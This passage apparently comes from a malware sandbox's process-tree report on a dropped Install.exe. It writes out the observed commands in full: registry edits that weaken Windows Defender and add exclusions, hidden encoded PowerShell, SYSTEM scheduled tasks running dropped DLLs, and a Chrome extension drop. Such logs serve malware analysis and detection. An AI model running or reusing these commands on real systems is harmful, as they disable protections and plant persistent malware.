- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 6164⤵
- Program crash
PID:1392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS6949.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS6949.tmp\Install.exe PL /AFBgdidQi 385132 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4408
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:64
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:8
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4792
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XphReJKfUekSjEjSEbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XphReJKfUekSjEjSEbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YnlfVYgOKBzU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YnlfVYgOKBzU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZBiqUlswAXUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZBiqUlswAXUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cxOzyxwiwgxKC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cxOzyxwiwgxKC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kaFWtwbAU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kaFWtwbAU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dsoplaoppeVRzxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dsoplaoppeVRzxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\KdbLiBGdyZJERcwDF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\KdbLiBGdyZJERcwDF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\xbydWIeeRqhITmFv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\xbydWIeeRqhITmFv\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XphReJKfUekSjEjSEbR" /t REG_DWORD /d 0 /reg:323⤵PID:4744
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XphReJKfUekSjEjSEbR" /t REG_DWORD /d 0 /reg:324⤵PID:3868
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XphReJKfUekSjEjSEbR" /t REG_DWORD /d 0 /reg:643⤵PID:4228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnlfVYgOKBzU2" /t REG_DWORD /d 0 /reg:323⤵PID:3684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnlfVYgOKBzU2" /t REG_DWORD /d 0 /reg:643⤵PID:2180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZBiqUlswAXUn" /t REG_DWORD /d 0 /reg:323⤵PID:988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZBiqUlswAXUn" /t REG_DWORD /d 0 /reg:643⤵PID:4536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cxOzyxwiwgxKC" /t REG_DWORD /d 0 /reg:323⤵PID:2408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cxOzyxwiwgxKC" /t REG_DWORD /d 0 /reg:643⤵PID:2728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kaFWtwbAU" /t REG_DWORD /d 0 /reg:323⤵PID:2828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kaFWtwbAU" /t REG_DWORD /d 0 /reg:643⤵PID:1380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dsoplaoppeVRzxVB /t REG_DWORD /d 0 /reg:323⤵PID:1992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dsoplaoppeVRzxVB /t REG_DWORD /d 0 /reg:643⤵PID:1184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\KdbLiBGdyZJERcwDF /t REG_DWORD /d 0 /reg:323⤵PID:2860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\KdbLiBGdyZJERcwDF /t REG_DWORD /d 0 /reg:643⤵PID:4284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\xbydWIeeRqhITmFv /t REG_DWORD /d 0 /reg:323⤵PID:4512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\xbydWIeeRqhITmFv /t REG_DWORD /d 0 /reg:643⤵PID:1528
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsiWOWVGk" /SC once /ST 02:34:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:3004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsiWOWVGk"2⤵PID:2836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsiWOWVGk"2⤵PID:3104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UVFLqlDmbCINydTUR" /SC once /ST 03:40:51 /RU "SYSTEM" /TR "\"C:\Windows\Temp\xbydWIeeRqhITmFv\jQcohwJgsRrySgp\xivOSoQ.exe\" cG /VjCGdidKj 385132 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "UVFLqlDmbCINydTUR"2⤵PID:4164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 8082⤵
- Program crash
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3648
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:4180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5112
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4344
-
C:\Windows\Temp\xbydWIeeRqhITmFv\jQcohwJgsRrySgp\xivOSoQ.exeC:\Windows\Temp\xbydWIeeRqhITmFv\jQcohwJgsRrySgp\xivOSoQ.exe cG /VjCGdidKj 385132 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3564 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvSiQPTrXwRygMomlS"2⤵PID:4728
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4704
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:3144
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:2940
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\kaFWtwbAU\aLHdrZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "TTZUhnhJvcIitvR" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TTZUhnhJvcIitvR2" /F /xml "C:\Program Files (x86)\kaFWtwbAU\HYlvdMs.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "TTZUhnhJvcIitvR"2⤵PID:3780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TTZUhnhJvcIitvR"2⤵PID:4856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EVsVVKiVoOzJUp" /F /xml "C:\Program Files (x86)\YnlfVYgOKBzU2\ntVIpYL.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fthGCZoYsYBPs2" /F /xml "C:\ProgramData\dsoplaoppeVRzxVB\CjQThBt.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dFpnYVinsiuoGJVuH2" /F /xml "C:\Program Files (x86)\XphReJKfUekSjEjSEbR\RRTSLjz.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AeBKYfIUwqqGnlYEImD2" /F /xml "C:\Program Files (x86)\cxOzyxwiwgxKC\AzbMATR.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZeToUwFKfeuZKVaZa" /SC once /ST 04:24:09 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\xbydWIeeRqhITmFv\TqdcjKPe\pfFXBVn.dll\",#1 /WjwmdidlMAe 385132" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZeToUwFKfeuZKVaZa"2⤵PID:2336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UVFLqlDmbCINydTUR"2⤵PID:3528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 20842⤵
- Program crash
PID:4288
-
-
